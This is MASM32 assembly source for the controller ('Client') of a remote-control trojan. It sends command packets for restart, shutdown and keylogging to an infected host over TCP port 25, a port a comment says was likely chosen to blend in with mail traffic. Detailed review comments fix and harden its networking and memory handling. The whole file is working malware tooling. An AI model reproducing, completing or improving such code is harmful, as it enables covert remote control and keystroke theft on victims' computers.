Client Source
.386
.model flat,stdcall
option casemap:none
EditSl PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
PushButton PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
ListBox PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
AddItems PROTO :DWORD
lstWndProc PROTO :DWORD,:DWORD,:DWORD,:DWORD
inv equ invoke
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\shell32.inc
include \masm32\include\wsock32.inc
include \masm32\include\gdi32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\wsock32.lib
includelib \masm32\lib\gdi32.lib
.const
; main-window size in pixels; also used by start to centre the window on screen
X_Win equ 300
Y_Win equ 300
; TCP port the command packet is sent to.  25 is the SMTP port, but nothing in
; this file speaks SMTP -- presumably picked so the traffic blends in (unverified).
port equ 25
; private message id handed to WSAAsyncSelect; WndProc has no handler for it
WM_SOCKET equ WM_USER+100
; resource ids (ICON is passed to LoadIcon; BMP is not referenced in this file)
ICON equ 1
BMP equ 10
; control ids, seen in the low word of WM_COMMAND's wParam
BTN_SEND equ 101 ; push button
EDIT_IP equ 111 ; edit box
EDIT_PAR1 equ 112
EDIT_PAR2 equ 113
EDIT_HIST equ 114
LST_FUNC equ 121 ; list box
; trojan functions: the command code sent as the first byte of the packet.
; Function is loaded straight from the list box's LB_GETCURSEL index, so these
; values presumably follow the entry order in list.asm -- verify against that file.
RESTART equ 0
SHUTDOWN equ 1
KEYLOG equ 2
.data
; window class registration: szClassName is the class name, szAppName the
; title; wc is pre-filled with the static fields, start fills in hInstance,
; the icons, cursor and background brush before RegisterClassEx
szClassName db "Win32ASM_Class", 0
szAppName db "Client", 0
wc WNDCLASSEX <SIZEOF WNDCLASSEX, CS_HREDRAW or CS_VREDRAW, offset WndProc, NULL, \
NULL, NULL, NULL, NULL, NULL, NULL, offset szClassName, NULL>
; predefined Win32 control class names used by EditSl / PushButton / ListBox
btnClass db "BUTTON", 0
slEdit db "EDIT", 0
lstClass db "LISTBOX", 0
; button caption and initial contents of the edit boxes
btnSend db "Send", 0
IP db "localhost", 0 ; default target host; whatever the user types replaces it
Par1 db "Parameter 1", 0
Par2 db "Parameter 2", 0
Hist db "Here goes the 'history'", 0 ; placeholder text of the read-only EDIT_HIST box
; strings
; scratch buffer AddItems copies each list entry into before LB_ADDSTRING;
; list entries are expected to be shorter than this (127 bytes + NUL)
ItemBuffer db 128 dup (0)
include list.asm ; expected to define item000000, the double-NUL-terminated item table AddItems walks
; network msgs
; command code sent as the first packet byte (RESTART/SHUTDOWN/KEYLOG);
; lstWndProc keeps it in sync with the list selection
Function db 0
.data?
hInstance dd ? ; module handle, also stored in wc.hInstance
hwnd dd ? ; main window
hBmp dd ? ; not referenced in this file
X_Pos dd ? ; top-left corner of the main window, computed in start
Y_Pos dd ?
msg MSG <?> ; message-loop scratch
; network
sin sockaddr_in <?> ; target address, filled in by the BTN_SEND handler
hSocket dd ? ; current socket, or 0 when none is open
wsadata WSADATA <?>
bRead dd ? ; not referenced in this file
bHost dd ? ; heap buffer holding the host text read from EDIT_IP
bSend dd ? ; heap buffer holding the outgoing packet
available_data dd ? ; not referenced in this file
hlstBox dd ? ; handle of the function list box
lpfnWndProc dd ? ; original LISTBOX procedure, saved when the list is subclassed
.code
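;---------------------------------------------------------------------------
; Program entry.  Initialises WinSock 1.1, completes and registers the window
; class, creates the main window centred on the primary screen and runs the
; message loop until WM_QUIT.  Exits with the WM_QUIT code in msg.wParam.
; Every call here that can fail (WSAStartup, RegisterClassEx, CreateWindowEx)
; is now checked; the original ran on regardless and would only have failed
; later inside socket() or the message loop with no diagnosis.
;---------------------------------------------------------------------------
start:
    inv WSAStartup, 101h, offset wsadata
    .if eax != 0                        ; WSAStartup returns the error code itself
        inv ExitProcess, 1
    .endif
    inv GetModuleHandle, NULL
    mov hInstance, eax
    mov wc.hInstance, eax
    inv LoadIcon, hInstance, ICON
    mov wc.hIcon, eax
    mov wc.hIconSm, eax
    inv LoadCursor, NULL, IDC_ARROW
    mov wc.hCursor, eax
    inv GetStockObject, BLACK_BRUSH
    mov wc.hbrBackground, eax
    inv RegisterClassEx, offset wc
    .if eax == 0                        ; atom 0 = registration failed
        inv WSACleanup
        inv ExitProcess, 1
    .endif
    ; centre the X_Win x Y_Win window on the screen
    inv GetSystemMetrics, SM_CXSCREEN
    shr eax, 1
    sub eax, X_Win / 2
    mov X_Pos, eax
    inv GetSystemMetrics, SM_CYSCREEN
    shr eax, 1
    sub eax, Y_Win / 2
    mov Y_Pos, eax
    inv CreateWindowEx, NULL, offset szClassName, offset szAppName, WS_OVERLAPPEDWINDOW, \
        X_Pos, Y_Pos, X_Win, Y_Win, NULL, NULL, hInstance, NULL
    .if eax == NULL
        inv WSACleanup
        inv ExitProcess, 1
    .endif
    mov hwnd, eax
    inv ShowWindow, hwnd, SW_SHOW
    inv UpdateWindow, hwnd
    ; message loop.  GetMessage returns 0 on WM_QUIT and -1 on error; the
    ; original only tested for 0 and would have dispatched a garbage MSG on -1.
    .while TRUE
        inv GetMessage, offset msg, NULL, 0, 0
        .break .if (eax == 0) || (eax == -1)
        inv TranslateMessage, offset msg
        inv DispatchMessage, offset msg
    .endw
    inv ExitProcess, msg.wParam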
; Window Proc
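; Offset of h_addr_list inside the WinSock hostent returned by gethostbyname
; (h_name, h_aliases, h_addrtype:2, h_length:2 precede it).  Same value the
; original hard-coded as [eax + 12].
HOSTENT_H_ADDR_LIST equ 12

;---------------------------------------------------------------------------
; BOOL OpenConnection(HWND hWnd)
; Reads the host typed into EDIT_IP (a name or a dotted quad), opens a TCP
; socket in hSocket and connects it to `port`.
; Returns eax = 1 with hSocket connected, or eax = 0 with hSocket = 0 if the
; host cannot be resolved, socket() fails or connect() fails.
; The connect is blocking.  The original called WSAAsyncSelect first, which
; makes the socket non-blocking, so connect() returned WSAEWOULDBLOCK and the
; send that followed raced the handshake -- and WndProc never handled the
; WM_SOCKET notification anyway.  The UI stalls for the connect timeout on an
; unreachable host; a WM_SOCKET/FD_CONNECT handler would be the way to get the
; asynchronous behaviour back.
; Clobbers eax, ecx, edx.
;---------------------------------------------------------------------------
OpenConnection proc hWnd:DWORD
    LOCAL ipAddr:DWORD

    ; drop any socket left over from an earlier attempt
    .if hSocket != 0
        inv closesocket, hSocket
        mov hSocket, 0
    .endif

    ; --- resolve the host text ------------------------------------------
    inv GlobalAlloc, GMEM_FIXED or GMEM_ZEROINIT, 1000
    .if eax == NULL
        xor eax, eax
        ret
    .endif
    mov bHost, eax
    inv GetDlgItemText, hWnd, EDIT_IP, bHost, 999
    inv gethostbyname, bHost
    .if eax != NULL
        mov eax, [eax + HOSTENT_H_ADDR_LIST] ; char **h_addr_list
        mov eax, [eax]                       ; first entry; NULL if the list is empty
        .if eax != NULL
            mov eax, [eax]                   ; IPv4 address, network byte order
        .endif
    .else
        inv inet_addr, bHost                 ; not a name: try it as a dotted quad
        .if eax == -1                        ; INADDR_NONE: unparsable
            xor eax, eax
        .endif
    .endif
    mov ipAddr, eax
    inv GlobalFree, bHost
    mov bHost, 0
    .if ipAddr == 0
        xor eax, eax
        ret
    .endif

    ; --- connect --------------------------------------------------------
    inv socket, PF_INET, SOCK_STREAM, 0
    .if eax == INVALID_SOCKET
        xor eax, eax
        ret
    .endif
    mov hSocket, eax
    mov sin.sin_family, AF_INET
    inv htons, port
    mov sin.sin_port, ax
    mov eax, ipAddr
    mov sin.sin_addr, eax
    inv connect, hSocket, offset sin, SIZEOF sin
    .if eax == SOCKET_ERROR
        inv closesocket, hSocket
        mov hSocket, 0
        xor eax, eax
        ret
    .endif
    mov eax, 1
    ret
OpenConnection endp

;---------------------------------------------------------------------------
; void SendCommand(HWND hWnd)
; Builds the request packet, sends it over the connected hSocket and closes
; the socket.  Wire layout, no terminators transmitted:
;   [Function:1] [len1:1] [par1:len1] [len2:1] [par2:len2]
;   Function   - current list selection (RESTART / SHUTDOWN / KEYLOG)
;   par1, par2 - text of EDIT_PAR1 / EDIT_PAR2; GetDlgItemText is bounded
;                to 100 bytes including the NUL, so each is at most 99 bytes,
;                the length fits a byte, and the packet is at most
;                3 + 99 + 99 = 201 bytes inside the 300-byte buffer.
; The send result is not surfaced (there is no status UI); the socket is
; closed either way.
; Uses EDI as the write cursor; Win32 API calls preserve EDI, so it survives
; the GetDlgItemText calls.  Clobbers eax, ecx, edx, edi.
;---------------------------------------------------------------------------
SendCommand proc hWnd:DWORD
    LOCAL pLen:DWORD                     ; where the pending length byte goes

    inv GlobalAlloc, GMEM_FIXED or GMEM_ZEROINIT, 300
    .if eax == NULL
        inv closesocket, hSocket
        mov hSocket, 0
        ret
    .endif
    mov bSend, eax
    mov edi, eax

    mov al, Function
    stosb                                ; [0] = command code

    ; parameter 1: reserve the length byte, copy the text after it
    mov pLen, edi
    inc edi
    inv GetDlgItemText, hWnd, EDIT_PAR1, edi, 100   ; eax = bytes copied (<= 99)
    mov ecx, pLen
    mov byte ptr [ecx], al
    add edi, eax                         ; edi -> par1's NUL, reused as len2's slot

    ; parameter 2, same layout
    mov pLen, edi
    inc edi
    inv GetDlgItemText, hWnd, EDIT_PAR2, edi, 100
    mov ecx, pLen
    mov byte ptr [ecx], al
    add edi, eax                         ; edi -> one past the last payload byte

    mov eax, edi
    sub eax, bSend                       ; packet length = 3 + len1 + len2
    inv send, hSocket, bSend, eax, 0
    inv GlobalFree, bSend
    mov bSend, 0
    inv closesocket, hSocket
    mov hSocket, 0
    ret
SendCommand endp

;---------------------------------------------------------------------------
; LRESULT WndProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
; Main-window procedure.
;   WM_CREATE  - creates the child controls and subclasses the function list
;                with lstWndProc so the selection is mirrored into Function.
;   WM_COMMAND - on BTN_SEND: resolve + connect, then send one packet.
;   WM_DESTROY - closes an open socket, tears down WinSock, posts WM_QUIT.
; Anything else goes to DefWindowProc.
; A window procedure is a stdcall callback and must preserve EBX/ESI/EDI;
; `uses edi` covers the register the packet builder writes through (the
; original clobbered it and returned to the system with EDI changed).
; NOTE(review): the protocol carries no authentication or integrity check;
; anything that can reach `port` on the server can issue RESTART/SHUTDOWN/
; KEYLOG.  That is a property of the server and wire format, not of this
; client, and is not changed here.
;---------------------------------------------------------------------------
WndProc proc uses edi hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
    .if uMsg == WM_DESTROY
        .if hSocket != 0
            inv closesocket, hSocket
            mov hSocket, 0
        .endif
        inv WSACleanup
        inv PostQuitMessage, NULL
    .elseif uMsg == WM_CREATE
        ; three single-line edits, a read-only history box, the Send button
        ; and the function list
        inv EditSl, offset IP, 10, 10, 130, 25, hWnd, EDIT_IP, 0
        inv EditSl, offset Par1, 10, 45, 130, 25, hWnd, EDIT_PAR1, 0
        inv EditSl, offset Par2, 10, 80, 130, 25, hWnd, EDIT_PAR2, 0
        inv EditSl, offset Hist, 10, 150, 270, 110, hWnd, EDIT_HIST, ES_READONLY
        inv PushButton, offset btnSend, hWnd, 40, 115, 80, 25, BTN_SEND
        inv ListBox, NULL, hWnd, 150, 10, 130, 130, LST_FUNC
        mov hlstBox, eax
        ; subclass the list; keep the original procedure for CallWindowProc
        inv SetWindowLong, hlstBox, GWL_WNDPROC, lstWndProc
        mov lpfnWndProc, eax
        inv AddItems, hlstBox
        inv SendMessage, hlstBox, LB_SETCURSEL, 0, 0
    .elseif uMsg == WM_COMMAND
        ; BN_CLICKED is 0, so a click arrives with wParam equal to the bare id
        .if wParam == BTN_SEND
            inv OpenConnection, hWnd
            .if eax != 0
                inv SendCommand, hWnd
            .endif
        .endif
    .else
        inv DefWindowProc, hWnd, uMsg, wParam, lParam
        ret
    .endif
    xor eax, eax
    ret
WndProc endp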
; #########################################################################
;---------------------------------------------------------------------------
; HWND EditSl(LPCSTR szMsg, int a, int b, int wd, int ht, HWND hParent,
;             int ID, DWORD mieps)
; Creates a single-line EDIT child of hParent with initial text szMsg at
; (a,b), size wd x ht, control id ID.  mieps is OR-ed into the fixed style
; (visible child, auto horizontal scroll, selection kept when unfocused),
; e.g. ES_READONLY for the history box.  Returns the window handle in eax.
;---------------------------------------------------------------------------
EditSl proc szMsg:DWORD, a:DWORD, b:DWORD, wd:DWORD, ht:DWORD, hParent:DWORD, ID:DWORD, mieps:DWORD
    LOCAL dwStyle:DWORD

    mov eax, mieps
    or eax, WS_VISIBLE or WS_CHILDWINDOW or ES_AUTOHSCROLL or ES_NOHIDESEL
    mov dwStyle, eax
    invoke CreateWindowEx, WS_EX_CLIENTEDGE, ADDR slEdit, szMsg, dwStyle, a, b, wd, ht, hParent, ID, hInstance, NULL
    ret
EditSl endp
; ########################################################################
;---------------------------------------------------------------------------
; HWND PushButton(LPCSTR lpText, HWND hParent, int a, int b, int wd, int ht, int ID)
; Creates a visible BUTTON child of hParent captioned lpText at (a,b), size
; wd x ht, control id ID.  Returns the window handle in eax.
;---------------------------------------------------------------------------
PushButton proc lpText:DWORD, hParent:DWORD, a:DWORD, b:DWORD, wd:DWORD, ht:DWORD, ID:DWORD
    LOCAL dwStyle:DWORD

    mov dwStyle, WS_CHILD or WS_VISIBLE
    invoke CreateWindowEx, 0, ADDR btnClass, lpText, dwStyle, a, b, wd, ht, hParent, ID, hInstance, NULL
    ret
PushButton endp
; ########################################################################
;---------------------------------------------------------------------------
; HWND ListBox(LPCSTR lpText, HWND hParent, int a, int b, int wd, int ht, int ID)
; Creates a visible LISTBOX child of hParent at (a,b), size wd x ht, control
; id ID, with a vertical scroll bar that stays visible, string storage and
; no integral-height snapping.  Returns the window handle in eax.
;---------------------------------------------------------------------------
ListBox proc lpText:DWORD, hParent:DWORD, a:DWORD, b:DWORD, wd:DWORD, ht:DWORD, ID:DWORD
    LOCAL dwStyle:DWORD

    mov dwStyle, WS_CHILD or WS_VISIBLE or WS_VSCROLL or LBS_HASSTRINGS or LBS_NOINTEGRALHEIGHT or LBS_DISABLENOSCROLL
    invoke CreateWindowEx, 0, ADDR lstClass, lpText, dwStyle, a, b, wd, ht, hParent, ID, hInstance, NULL
    ret
ListBox endp
; #########################################################################
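;---------------------------------------------------------------------------
; void AddItems(HWND hWnd)
; Fills the list box hWnd from the item table item000000 (list.asm): a run of
; NUL-terminated strings ended by an extra NUL.  Each entry is copied into
; ItemBuffer and added with LB_ADDSTRING in table order, so an entry's index
; is the command code lstWndProc later stores in Function.
; Entries are clipped to SIZEOF ItemBuffer - 1 bytes; the original copied
; unbounded and an over-long entry would have run past ItemBuffer into the
; data that follows it.
; ESI/EDI are saved via USES: the caller is the WndProc callback, which must
; hand them back to the system intact.  Clobbers eax, ecx, edx.
;---------------------------------------------------------------------------
AddItems proc uses esi edi hWnd:DWORD
    mov esi, offset item000000
ai_next_item:
    mov edi, offset ItemBuffer
    xor ecx, ecx                         ; bytes stored for this entry
ai_copy:
    lodsb
    test al, al
    jz ai_item_done
    cmp ecx, SIZEOF ItemBuffer - 1
    jae ai_copy                          ; buffer full: skip the rest up to the NUL
    stosb
    inc ecx
    jmp ai_copy
ai_item_done:
    mov byte ptr [edi], 0                ; terminate the copy
    inv SendMessage, hWnd, LB_ADDSTRING, 0, ADDR ItemBuffer
    cmp byte ptr [esi], 0                ; a second NUL ends the table
    jne ai_next_item
    ret
AddItems endp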
; #########################################################################
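;---------------------------------------------------------------------------
; LRESULT lstWndProc(HWND hWin, UINT uMsg, WPARAM wParam, LPARAM lParam)
; Subclass procedure for the function list (installed with SetWindowLong in
; WM_CREATE; lpfnWndProc holds the original LISTBOX procedure).  After the
; list has processed a click, double-click or typed character, the current
; selection index is copied into the global Function byte, which the
; BTN_SEND handler sends as the first byte of the packet.
; Returns the original procedure's result.
; Two fixes over the original: the selection is read *after* forwarding the
; message, because the list box changes it while handling the message (e.g.
; type-ahead on WM_CHAR), so reading first lagged one event behind; and
; LB_ERR (-1) is compared against the full 32-bit result instead of AL,
; where it had been truncated to 0FFh.
;---------------------------------------------------------------------------
lstWndProc proc hWin:DWORD, uMsg:DWORD, wParam:DWORD, lParam:DWORD
    LOCAL lResult:DWORD

    inv CallWindowProc, lpfnWndProc, hWin, uMsg, wParam, lParam
    mov lResult, eax
    .if (uMsg == WM_LBUTTONDBLCLK) || (uMsg == WM_LBUTTONUP) || (uMsg == WM_CHAR)
        inv SendMessage, hWin, LB_GETCURSEL, 0, 0
        .if eax != LB_ERR
            mov Function, al             ; index is a small command code (RESTART/SHUTDOWN/KEYLOG)
        .endif
    .endif
    mov eax, lResult
    ret
lstWndProc endp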
end start